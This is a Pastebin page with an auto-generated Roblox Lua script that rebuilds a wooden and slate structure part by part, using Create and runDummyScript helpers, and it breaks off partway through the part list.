Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --Created with ttyyuu12345's compiler
- --ttyyuu12345 is not responsible for damages caused to your game
- --This plugin does not remove things
- --ttyyuu12345 cannot be held resonsible for manual deletion for the purpose of testing
- --Keep in mind, any items that cause errors in compilation will be skipped and documented within the last line of the disclaimer comments
- --Thank you for using my plugin and enjoy :)
- --It is free to use, however I do accept donations
- --Errors: UnionOperation
- Create = function(itemClass,tabl)
- local item = Instance.new(itemClass)
- for i,v in pairs(tabl) do
- local a,b = ypcall(function() return item[i] end)
- if a then
- item[i] = tabl[i]
- end
- end
- return item
- end
- function runDummyScript(f,scri)
- local oldenv = getfenv(f)
- local newenv = setmetatable({}, {
- __index = function(_, k)
- if k:lower() == 'script' then
- return scri
- else
- return oldenv[k]
- end
- end
- })
- setfenv(f, newenv)
- ypcall(function() f() end)
- end
- cors = {}
- mas = Instance.new("Model",game:GetService("Lighting"))
- mas.Name = "CompiledModel"
- o1 = Create("Model",{
- ["Parent"] = mas,
- })
- o2 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(226.939972, 9.0494175, 31.5577221),
- ["Rotation"] = Vector3.new(-2.15313571e-006, -34.1240768, 0.115936436),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(226.939972, 9.0494175, 31.5577221, 0.827822983, -0.00167507923, -0.560986876, 0.00202353043, 0.999998033, 3.11090673e-008, 0.560985804, -0.0011352147, 0.827824414),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o3 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(184.15123, 21.3781757, 48.6700935),
- ["Rotation"] = Vector3.new(-83.9014816, 8.7717123, -34.5368118),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(184.15123, 21.3781757, 48.6700935, 0.814127088, 0.560304463, 0.152497917, -0.185141414, 0.0015478807, 0.982710481, 0.550381243, -0.828285038, 0.104995787),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o4 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(206.554672, 16.2679024, 39.7395439),
- ["Rotation"] = Vector3.new(-179.893265, 34.0776711, 179.808594),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(206.554672, 16.2679024, 39.7395439, -0.828273952, -0.00276704016, 0.560316265, -0.00229692156, 0.999995828, 0.00154305133, -0.560318053, -9.00036684e-006, -0.82827729),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(26.6099987, 1.40999997, 38.4399986),
- ["BottomSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["TopSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o5 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(206.519653, 9.04941845, 17.8042259),
- ["Rotation"] = Vector3.new(-4.07922107e-006, -34.1240692, -1.18494363e-005),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(206.519653, 9.04941845, 17.8042259, 0.827824652, 1.71203808e-007, -0.560986817, -1.30810434e-007, 1.00000012, 5.89376512e-008, 0.560987055, 8.30304447e-009, 0.827824414),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o6 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(216.632477, 9.04941845, 47.0533371),
- ["Rotation"] = Vector3.new(-0.000378639379, -34.1240768, 1.15109539),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(216.632477, 9.04941845, 47.0533371, 0.827657282, -0.0166302081, -0.560986876, 0.0200927947, 0.999798119, 5.47068021e-006, 0.560873568, -0.0112763336, 0.827824354),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o7 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(196.185257, 9.04941845, 33.1970139),
- ["Rotation"] = Vector3.new(-4.07922107e-006, -34.1240692, -1.18494363e-005),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(196.185257, 9.04941845, 33.1970139, 0.827824652, 1.71203808e-007, -0.560986817, -1.30810434e-007, 1.00000012, 5.89376512e-008, 0.560987055, 8.30304447e-009, 0.827824414),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o8 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(188.654175, 20.8544636, 44.4860458),
- ["Rotation"] = Vector3.new(52.8977852, -22.089941, 26.6324081),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(188.654175, 20.8544636, 44.4860458, 0.828282952, -0.415359348, -0.376061589, 0.00230080006, 0.673683226, -0.739015043, 0.560302973, 0.611249626, 0.558957636),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 13.7999992, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o9 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(198.923325, 20.8881817, 51.4896622),
- ["Rotation"] = Vector3.new(52.8977852, -22.089941, 26.6324081),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(198.923325, 20.8881817, 51.4896622, 0.828282952, -0.415359348, -0.376061589, 0.00230080006, 0.673683226, -0.739015043, 0.560302973, 0.611249626, 0.558957636),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 13.6999989, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o10 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(187.522369, 18.6095905, 50.8729706),
- ["Rotation"] = Vector3.new(162.770752, -54.6758614, -104.287605),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(187.522369, 18.6095905, 50.8729706, -0.142693669, 0.560316086, -0.815894067, 0.985224009, 0.00152560498, -0.171260402, -0.0947153196, -0.828276515, -0.552255213),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o11 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(187.794586, 17.9195919, 51.0884666),
- ["Rotation"] = Vector3.new(134.809891, -46.1191902, -126.065994),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(187.794586, 17.9195919, 51.0884666, -0.408074826, 0.560308695, -0.720783293, 0.870727539, 0.00154980388, -0.491761923, -0.274421781, -0.828281522, -0.488509387),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o12 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(185.070679, 22.7386417, 49.2383461),
- ["Rotation"] = Vector3.new(26.4330235, 52.9541206, -111.55217),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(185.070679, 22.7386417, 49.2383461, -0.221310452, 0.560332716, 0.798153341, -0.963366807, 0.0015136702, -0.268183351, -0.151479915, -0.828266084, 0.539470911),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o13 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(185.597443, 20.1082058, 49.6224289),
- ["Rotation"] = Vector3.new(-31.0958328, 51.6619644, -64.5873718),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(185.597443, 20.1082058, 49.6224289, 0.266191542, 0.56027925, 0.78436476, -0.947292089, 0.00156439503, 0.320366323, 0.178267926, -0.828301907, 0.531164646),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o14 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(185.601837, 17.6480999, 49.635807),
- ["Rotation"] = Vector3.new(30.9966354, 51.7545929, -115.165581),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(185.601837, 17.6480999, 49.635807, -0.263233423, 0.560272932, 0.785366535, -0.94782263, 0.00155250332, -0.318793029, -0.179830015, -0.828305423, 0.530631304),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o15 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(185.762619, 18.8681736, 49.7167664),
- ["Rotation"] = Vector3.new(-1.37014234, 55.9160767, -88.7757339),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(185.762619, 18.8681736, 49.7167664, 0.0119735599, 0.560276806, 0.828217626, -0.999908686, 0.00155916798, 0.0133999633, 0.00621677609, -0.828302741, 0.560244679),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o16 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(193.309113, 17.6642952, 54.7413597),
- ["Rotation"] = Vector3.new(-57.2756462, 36.258976, -42.7410393),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(193.309113, 17.6642952, 54.7413597, 0.592206717, 0.547258496, 0.591435969, -0.732320845, 0.0593404695, 0.678367257, 0.336146712, -0.834855139, 0.435911357),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o17 = Create("BlockMesh",{
- ["Parent"] = o16,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o18 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(194.023544, 17.1442432, 55.1012268),
- ["Rotation"] = Vector3.new(-79.3813553, 9.9000473, -33.7470207),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(194.023544, 17.1442432, 55.1012268, 0.819115698, 0.547254026, 0.171929911, -0.242879167, 0.0593448132, 0.968238413, 0.519670069, -0.834857821, 0.181527063),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o19 = Create("BlockMesh",{
- ["Parent"] = o18,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o20 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(194.37468, 23.8915825, 55.4683838),
- ["Rotation"] = Vector3.new(80.1659164, 14.3155565, -144.672363),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(194.37468, 23.8915825, 55.4683838, -0.790523827, 0.560294688, 0.247262105, -0.29752934, 0.0015340565, -0.954709709, -0.535299718, -0.828288674, 0.165491924),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o21 = Create("BlockMesh",{
- ["Parent"] = o20,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o22 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(195.485718, 20.1255207, 56.2374611),
- ["Rotation"] = Vector3.new(89.9992599, 0.158405349, -145.922668),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(195.485718, 20.1255207, 56.2374611, -0.828277707, 0.560308456, 0.00276469137, -0.00229723868, 0.00153836422, -0.999994636, -0.560311198, -0.828279614, 1.29616756e-005),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.69982648, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o23 = Create("BlockMesh",{
- ["Parent"] = o22,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o24 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(195.83519, 17.083107, 56.4552574),
- ["Rotation"] = Vector3.new(-87.6582565, -2.63452959, -33.2191429),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(195.83519, 17.083107, 56.4552574, 0.835695863, 0.547262967, -0.0459650122, 0.0160363633, 0.0593429506, 0.998107672, 0.548956037, -0.834852099, 0.0408164822),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.78975677, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o25 = Create("BlockMesh",{
- ["Parent"] = o24,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o26 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.WoodPlanks,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(195.446213, 21.0412521, 55.4880829),
- ["Rotation"] = Vector3.new(-90.0005264, -0.158547074, -34.0778084),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(195.446213, 21.0412521, 55.4880829, 0.828274131, 0.560316026, -0.00276716496, 0.00229702517, 0.00154308253, 0.999995589, 0.56031841, -0.828277111, -9.08436868e-006),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(37.329998, 1, 10.1700001),
- ["BottomSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["TopSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o27 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(196.989822, 19.069458, 57.2329254),
- ["Rotation"] = Vector3.new(-0.234880283, 55.9217491, -89.7170486),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(196.989822, 19.069458, 57.2329254, 0.00276708649, 0.560315192, 0.828273058, -0.999994814, 0.00154283375, 0.0022969977, 9.09945811e-006, -0.82827574, 0.560317516),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.04980421, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o28 = Create("BlockMesh",{
- ["Parent"] = o27,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o29 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(185.110855, 20.8982029, 49.3213387),
- ["Rotation"] = Vector3.new(-70.4966965, 26.1483154, -38.6213493),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(185.110855, 20.8982029, 49.3213387, 0.70132798, 0.560290754, 0.440696299, -0.532941461, 0.0015547534, 0.846150577, 0.473405272, -0.828294456, 0.299692482),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o30 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(192.603973, 19.3342075, 54.2294998),
- ["Rotation"] = Vector3.new(-19.8534527, 54.4231644, -70.164238),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(192.603973, 19.3342075, 54.2294998, 0.197416469, 0.547273278, 0.813336015, -0.978487372, 0.0593233854, 0.197585478, 0.0598835051, -0.834846675, 0.547212481),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o31 = Create("BlockMesh",{
- ["Parent"] = o30,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o32 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(193.884201, 23.6400738, 55.2213211),
- ["Rotation"] = Vector3.new(77.1047592, 24.039917, -143.1828),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(193.884201, 23.6400738, 55.2213211, -0.731111765, 0.547284007, 0.407372981, -0.45163545, 0.0593091734, -0.890227497, -0.511369526, -0.834840059, 0.203811571),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o33 = Create("BlockMesh",{
- ["Parent"] = o32,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o34 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(192.733429, 21.9840508, 54.3505669),
- ["Rotation"] = Vector3.new(32.7876167, 53.2893982, -113.717636),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(192.733429, 21.9840508, 54.3505669, -0.240441248, 0.547282755, 0.801665068, -0.944294155, 0.059309613, -0.32370919, -0.224707544, -0.834841132, 0.502536833),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o35 = Create("BlockMesh",{
- ["Parent"] = o34,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o36 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(192.541687, 20.7241287, 54.153244),
- ["Rotation"] = Vector3.new(3.18686366, 56.8166161, -89.2647476),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(192.541687, 20.7241287, 54.153244, 0.00702333124, 0.547272801, 0.836923063, -0.997772634, 0.0593353398, -0.0304268375, -0.0663110316, -0.834846079, 0.546471834),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o37 = Create("BlockMesh",{
- ["Parent"] = o36,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o38 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(190.192764, 17.1990795, 52.6182594),
- ["Rotation"] = Vector3.new(74.8750992, 21.2280579, -143.052628),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(190.192764, 17.1990795, 52.6182594, -0.744960308, 0.560295641, 0.362081081, -0.436183661, 0.00157364528, -0.899856031, -0.504755616, -0.828290582, 0.243219465),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o39 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(189.161545, 16.9892216, 51.8979912),
- ["Rotation"] = Vector3.new(89.3573914, 1.1100409, -145.917831),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(189.161545, 16.9892216, 51.8979912, -0.828079045, 0.560276091, 0.0193726551, -0.0223292559, 0.00156648294, -0.999749124, -0.560166478, -0.828303695, 0.0112132533),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.40999985, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o40 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(192.871933, 18.4242573, 54.3644791),
- ["Rotation"] = Vector3.new(-37.6424026, 48.7856941, -56.162323),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(192.871933, 18.4242573, 54.3644791, 0.366889238, 0.547273755, 0.752250373, -0.913540065, 0.0593223944, 0.402395725, 0.175595641, -0.834846497, 0.521722317),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o41 = Create("BlockMesh",{
- ["Parent"] = o40,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o42 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(193.224213, 23.0039597, 54.7321472),
- ["Rotation"] = Vector3.new(64.2602768, 37.2378998, -136.573837),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(193.224213, 23.0039597, 54.7321472, -0.578196704, 0.547273636, 0.605125844, -0.694406927, 0.0592978597, -0.717133045, -0.42835173, -0.834847629, 0.345745385),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43990743, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o43 = Create("BlockMesh",{
- ["Parent"] = o42,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o44 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(190.924911, 17.9591236, 53.0765839),
- ["Rotation"] = Vector3.new(51.2138329, 42.8680077, -130.140396),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(190.924911, 17.9591236, 53.0765839, -0.472487777, 0.560295224, 0.680311739, -0.820735931, 0.00156722707, -0.571305096, -0.321165979, -0.82829082, 0.459114045),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o45 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(191.185699, 21.4239826, 53.2081642),
- ["Rotation"] = Vector3.new(-1.16700768, 55.9170227, -88.9439545),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(191.185699, 21.4239826, 53.2081642, 0.0103282901, 0.560297132, 0.828226864, -0.999933422, 0.00156213157, 0.0114133479, 0.00510081183, -0.828289866, 0.560275912),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(6.25, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o46 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(188.366119, 17.2695656, 51.3763733),
- ["Rotation"] = Vector3.new(113.624832, -30.53512, -139.418625),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(188.366119, 17.2695656, 51.3763733, -0.654156029, 0.560310602, -0.508066416, 0.614223838, 0.00154896674, -0.789129674, -0.441371262, -0.828280389, -0.345169693),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o47 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(208.960693, 20.8544636, 58.2469177),
- ["Rotation"] = Vector3.new(52.8977852, -22.089941, 26.6324081),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(208.960693, 20.8544636, 58.2469177, 0.828282952, -0.415359348, -0.376061589, 0.00230080006, 0.673683226, -0.739015043, 0.560302973, 0.611249626, 0.558957636),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 13.7999992, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o48 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(187.44841, 21.8326244, 50.8402557),
- ["Rotation"] = Vector3.new(179.765121, -55.9218445, -90.2831726),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(187.44841, 21.8326244, 50.8402557, -0.00276924483, 0.560315967, -0.828274012, 0.999996006, 0.00154677778, -0.00229700468, -5.89298361e-006, -0.828277051, -0.560318172),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(5.46999979, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o49 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(184.646622, 21.8386478, 48.968811),
- ["Rotation"] = Vector3.new(58.0552711, 38.110611, -134.589142),
- ["Anchored"] = true,
